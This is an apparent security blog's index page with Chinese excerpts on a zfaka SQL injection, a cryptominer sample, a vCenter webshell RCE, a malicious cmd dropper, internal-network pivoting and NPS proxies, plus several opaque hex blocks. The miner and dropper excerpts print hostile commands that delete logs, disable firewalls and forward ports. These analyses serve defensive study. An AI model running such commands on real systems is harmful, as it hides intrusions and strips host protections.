Sp4ce's Blog

zfaka官方于7月11日发布了补丁，修复了一处sql注入，简单记录下分析过程 0x01补丁补丁显示修改了application/function/F_Network.php文件，该文件的getClientIP函数使用了网络上通用遍历XFF等header头获取真实IP的方法,但是获取完XFF后根据,截断获取第一个值后直接返回IP 0x02 分析全局搜索下调用该函数的位置，发现前台的application/modules/Product/controllers/Order.php文件和application/modules/Product/controllers/Query.php调用了该函数，对应功能为下单和订单查询功能 进一步确认后为application/modules/Product/controllers/Query.php第151行为存在漏洞的代码 0x03 动态调试对151行下断点进行调试 找到对应功能 成功断下，单步跟入 发现在application/library/Core/Model.php中的Where方法对orderid 、isdelete 、 ip ...

捕获到一个挖矿样本,分析记录下 0x01 源代码分析newinit.sh、init.sh这两个文件差不多，功能写到注释里了 #!/bin/sh### # @Author : Sp4ce # @Date : 2021-07-07 14:20:20 # @LastEditors : Sp4ce # @LastEditTime : 2021-07-07 20:41:59 # @Description : Challenge Everything.### ulimit -n 65535#删除syslog等rm -rf /var/log/syslogchmod 777 /usr/bin/chattrchmod 777 /bin/chattrchattr -iua /tmp/chattr -iua /var/tmp/ufw disableiptables -Fsysctl kernel.nmi_watchdog=0echo '0' >/proc/sys/kernel/nmi_watchdogecho 'ker ...

cf28e38f6ac4f5e95851816814fbdda9dfd279056c49edf577de2f9ccd08ee5e64d5d3018edcec73f0700693bbfbdee982372d8b819547d266a278d01d8abe7665bd005358cffb620eacdfc6e6f4dcd16735b03514184fdb57e594c3970394e1996bebff558e874d58822c536c47dbf7adaecdb927855fc803aaa13827e72d6bbaf0dc1e83abfe64838018bd61937e396bf8c82dbf696f4b7a46d1ff670e305068c4e543ebd012c0969abd6774689f8551540c6b7875d3c510018e47e4f247b9d5ddc6c3394f79fbdb60049cb3d752fd03f2bcd92b7e2e24a338b6f74da130b0f41d3fd572d2931368f8094b7aeed7b22748634459b91d495 ...

5150748bf737f3a97c7e160f9838b2aa7c1478bfb37ad70cf66bff638defbf41eb72e3d9711a8b3946b8114e09bc124caaad8d4a20d87be30b2f4963f9e99215bb8d06796f5557914d66484429723af672b493cd17dcd45199a2d11323544e4dc43a919e31309e1e6604a11d7a2f313b452a6add87437e6cf687af83b66cc0fd618d5848d9b8085072cb4484133e91879c81271217cc85cdaae0c7858e3d4040cf5c6f2a1fa53b10c8e1425031ffd43bbb183abfc0023a4af0d0e3621e02a1a52275d9e88d39848a50eb22f9140114fe5ad395ba860772ead1c3d43d007cdc28a3d352598b841d741cbec97adc5f5162eca8a05abb49e0d4f ...

eb824d0c3078d7071c299501a08c8f43041d3e76a945ac3615dc16de2c3cca4ac40fe9a3fbffcc8e336bb885e87ebb8644ae8e894f2f5005787ac131c74eaaa2b0a8eaa39da8b9c5fed276e24e54922dabf714383d2e7e323776e8eee3012b3f87ff3834ec3755221fd377790edbfb947df3e2097b11da7006ee0dd7c416bc1974528cc35c9a3207ac4810b8d1a346f3ea256d6a8624e1cde2826473aaa83ebae2f56ba8868d73b556deaded764e35b564f485ea97a8ae76b554520ba04f8255553f540103874384b15e2f2175faaa9ef67a4a6f3c2a127bf9cb3017c94ccfcaac384116405ed1d10f7ed9c80f5176825c054ad86b4279ff7 ...

960db46b85e4f1c2129e5a158ba45e2f900174e196f8022ab47d5fdab50884805d80842275d5882ab968f1fc9c5554882fa81e9914bc9fc50e27e78b08ec898df95804717a1b0de5853a2eedf36d4246561fbc4dd1970f74faf2ce2642a72d2ea3fd3f32f07297bccc498bd79cb1ddbdf498cd4acd7f50c8a15527d0f31efb1758c87d7aec1b98e7d48151c0480e4d5260c62d974928c0ad5ea802916a5e220456e3a9c337f3833b30fef070fad154887252ad7582629293f4b4d9f7a1c708507ff3ad1ea1c58a2bc629a5f03cb50b6872e25a9dfc8b5c403f026443a6bb6175bcdf35c30f0cf224e12203ea260857f1d5b2e10ac1e683a2c ...

5005d86a3a21de048851d9b4e8589a006ed31ab6429859f802328f796a4f9bdc9a9dd239215f341023d647878ac78bef6aba0f19b8b4d5fbf04c3e82ef0b4dacb69fb6d8c49ab027f0d83d84e9907a8a2cb851189edf09a38345adb5c040847922d9df0c3f2c6eaadba09382ffa8cc04e66fb3eaa46b37765d92bbd82f2425c37aad4919f4fec944fa43fbb9a7e6d89b9f4dacbb663cfaa357fbd00360f93d88eb0f50547b8c7766171f7c43023cc0bd08cdeba1940a0971baf6cab3d06c23904838315c9bfea6c48f46b03e4a51a9076f9a7bc6afb6564f2f02d262d66bf2c23f17c8bfe34c6c5439395fc5ffdffaf29532c0778477bd510 ...

ab25afeadadafaae7d7a621a49e585c17a13c1a75909c15784612f9bdef06e3dbdd10244f1ffa995cd5c9189e7b5836d0bbe770d8b86fb56165520d99bdd21544275702b4e06fa17b5709eafe3de319576c8c376442a305604ff5e5ff63756ee19e8a050cefac8214ddc9cf53c8ef9c43e8ef7a1d9b57faf79ce02af4115d5f67e502af26f51faaa65744c1e9c52d5f4fa72b0bf6b92d814fe8addc960797f62391eec216e2c407f567654761d4c7271e9be776b5c92d1d1792b5d53f1805e2754dca76d72f7e6a0046b7cb17cc1d5b06c387325a678a8861f606598486c28cc330241b3c6355c11f7ccc9cba1f2c99577e9be94648add950 ...

0x01 背景vSphere是VMware推出的虚拟化平台套件，包含ESXi、vCenter Server等一系列的软件。其中vCenter Server为 ESXi的控制中心，可从单一控制点统一管理数据中心的所有vSphere主机和虚拟机，使得IT管理员能够提高控制能力，简化入场任务，并降低IT环境的管理复杂性与成本。 vSphere Client（HTML5）在vCenter Server插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放443端口的服务器向vCenter Server发送精心构造的请求，从而在服务器上写入webshell，最终造成远程任意代码执行。 0x02 代码分析vCenter Server的vROPS插件的API未经过鉴权，存在一些敏感接口。其中 uploadova 接口存在一个上传 OVA 文件的功能： @RequestMapping( value = {"/uploadova"}, method = {RequestMethod.POST})public void uploadO ...

起因 分析1.txt文本内容如下 cmd /c echo RmMrcM >> c:\windows\temp\msInstall.exe&echo copy /y c:\windows\temp\msInstall.exe c:\windows\kNnk.exe>c:/windows/temp/p.bat&echo "*" >c:\windows\temp\eb.txt&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2 >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.b ...

内网渗透中经常碰到多个网段的机器不出网的情况，做一套试验环境来练习下多级代理 环境介绍以下环境均在VM16中搭建 LEDE x2.36 软路由 *1 网络：可出网，边界，IP 172.16.17.100 虚拟机配置：2C 4G 4网卡 Windows server 2019 *1 网络：可出网，DMZ，WEB机，IP 172.16.18.2 虚拟机配置：2C 2G 1网卡 Windows server 2016 *1 网络：不可出网，DMZ，IP 10.100.100.2 虚拟机配置：2C 2G 1网卡 Windows server 2008 R2*1 网络：不可出网，DMZ，IP 192.168.37.1 虚拟机配置：2C 2G 1网卡 Win10 *1 网络：通Win2019 虚机配置：4C8G 1网卡 拓扑图 攻击机配置 Win10 kali (parrot亦可) 过程LEDE配置安装好LEDE后配置接口如下 配置后状态如图 防火墙配置如下 DMZ规则 DMZ_WAN规则 端口转发规则LEDE防火墙新建端口转发规则 测试连通性3台 ...

NPS作为一款轻量级、高性能、功能强大的内网穿透代理服务器。并且支持多种协议的转发从而被广泛使用，借助网络空间搜索引擎2020年11月26日的结果，全球范围内共5,582个主机为NPS代理服务器。 目录解析以NPS 0.26.9版本为例，目录结构及含义如下 │ nps│ ├───conf //配置目录│ clients.json //客户端数据文件 │ hosts.json //主机数据文件│ nps.conf //配置文件│ server.key //私钥│ server.pem //证书│ tasks.json //任务数据文件│ └───web //网站目录 ├───static //静态资源目录 │ ├───css │ │ bootstrap-table.min.css ...